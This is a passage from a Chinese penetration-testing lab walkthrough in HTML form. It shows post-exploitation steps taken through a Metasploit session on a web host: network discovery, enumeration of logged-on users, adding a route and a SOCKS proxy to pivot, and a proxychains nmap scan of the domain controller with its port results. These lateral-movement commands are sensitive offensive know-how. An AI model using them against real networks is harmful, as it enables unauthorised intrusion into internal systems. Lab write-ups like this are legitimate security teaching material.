        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">ifconfig </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">得到两个 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">ip </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">段</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:295.7pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">10.10.10.150 192.168.0.150</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:20.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="353" src="https://www.2k8.org/content/uploadfile/202203/17/3009135c.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">arp</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:23.1pt;margin-left:1.55pt;margin-right:0cm;margin-top:0cm;">
        <img width="468" height="309" src="https://www.2k8.org/content/uploadfile/202203/17/42685ca3.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:11.5pt;margin-left:-.25pt;">
        <a name="_Toc21064"></a><span lang="EN-US">5.1.4.</span><span><span style="font-family:宋体;font-weight:normal;">终端设置乱码</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">在<span lang="EN-US">metasploit</span>终端使用<span lang="EN-US">shell</span>返回的信息会有乱码，可以设置编码防止乱码</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:25.3pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:宋体;font-size:10.5pt;line-height:112%;">chcp 65001</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:12.95pt;margin-left:-.25pt;line-height:107%;">
        <a name="_Toc21065"></a><span lang="EN-US">5.1.5.</span><span><span style="font-family:宋体;font-weight:normal;">终端执行命令信息收集命令</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">ipconfig /all</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:20.75pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="414" src="https://www.2k8.org/content/uploadfile/202203/17/30ce7da5.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dns 10.10.10.149</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dns </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">一般都是与域控同一个 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">ip</span><span lang="EN-US"></span>
</p>
<table border="0" cellpadding="0" cellspacing="0" width="540" style="border-collapse:collapse;font-family:等线;font-size:10.5pt;margin-left:-5.4pt;width:404.85pt;" class="ke-zeroborder">
        <tbody>
                <tr style="height:16.1pt;">
                        <td valign="top" width="268" style="border:solid black 1.0pt;height:16.1pt;padding:4.8pt 5.75pt 0cm 5.4pt;width:201.25pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">DC</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td valign="top" width="271" style="border:solid black 1.0pt;border-left:none;height:16.1pt;padding:4.8pt 5.75pt 0cm 5.4pt;width:203.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">10.10.10.149</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:16.1pt;">
                        <td valign="top" width="268" style="border:solid black 1.0pt;border-top:none;height:16.1pt;padding:4.8pt 5.75pt 0cm 5.4pt;width:201.25pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">WEB</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td valign="top" width="271" style="border-bottom:solid black 1.0pt;border-left:none;border-right:solid black 1.0pt;border-top:none;height:16.1pt;padding:4.8pt 5.75pt 0cm 5.4pt;width:203.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">10.10.10.150</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
        </tbody>
</table>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:12.95pt;margin-left:-.25pt;line-height:107%;">
        <a name="_Toc21066"></a><span lang="EN-US">5.1.6.</span><span><span style="font-family:宋体;font-weight:normal;">获取登录过的用户信息</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:189.8pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">run post/windows/gather/enum_logged_on_users</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:70.9pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="285" src="https://www.2k8.org/content/uploadfile/202203/17/ca55569b.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
        <a name="_Toc21067"></a><span lang="EN-US">5.1.7.</span><span><span style="font-family:宋体;font-weight:normal;">添加路由渗透 </span><span lang="EN-US">DC </span></span><span><span style="font-family:宋体;font-weight:normal;">域控</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">run autoroute -s 10.10.10.0/24</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:41.15pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="115" src="https://www.2k8.org/content/uploadfile/202203/17/376abd01.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
        <a name="_Toc21068"></a><span lang="EN-US">5.1.8.</span><span><span style="font-family:宋体;font-weight:normal;">开启代理</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">use auxiliary/server/socks4a</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="270" src="https://www.2k8.org/content/uploadfile/202203/17/855a54e1.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"><br clear="all" style="page-break-before:always;" />
</span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:.75pt;margin-left:-.25pt;">
        <a name="_Toc21069"></a><span lang="EN-US">5.1.9.</span><span><span style="font-family:宋体;font-weight:normal;">设置 </span><span lang="EN-US">porychanins </span></span><span><span style="font-family:宋体;font-weight:normal;">代理 </span><span lang="EN-US">nmap </span></span><span><span style="font-family:宋体;font-weight:normal;">扫描</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:25.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="589" src="https://www.2k8.org/content/uploadfile/202203/17/b3db6441.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">proxychains nmap -sT -A -Pn</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">10.10.10.149</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:10.7pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="357" src="https://www.2k8.org/content/uploadfile/202203/17/9abd7965.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:235.15pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Nmap scan report for 10.10.10.149 Host is up (0.98s latency).</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Not shown: 982 closed ports</span><span lang="EN-US"></span>
</p>
<table border="0" cellpadding="0" cellspacing="0" width="220" style="border-collapse:collapse;font-family:等线;font-size:10.5pt;width:164.65pt;" class="ke-zeroborder">
        <tbody>
                <tr style="height:12.9pt;">
                        <td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">PORT</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="152" colspan="2" valign="top" style="width:113.75pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:5.9pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">STATE SERVICE</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">53/tcp</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.1pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">domain</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">88/tcp</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.1pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">kerberos-sec</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">135/tcp</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">msrpc</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">139/tcp</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">netbios-ssn</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">389/tcp</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">ldap</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">445/tcp</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">microsoft-ds</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">464/tcp</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">kpasswd5</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">593/tcp</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;text-align:justify;text-justify:inter-ideograph;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">http-rpc-epmap</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">636/tcp</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">ldapssl</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">3268/tcp</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.7pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.9pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">globalcatLDAP</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">3269/tcp</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.7pt;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.9pt;margin-right:0cm;margin-top:0cm;text-align:justify;text-justify:inter-ideograph;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">globalcatLDAPssl</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49152/tcp   open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49153/tcp   open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
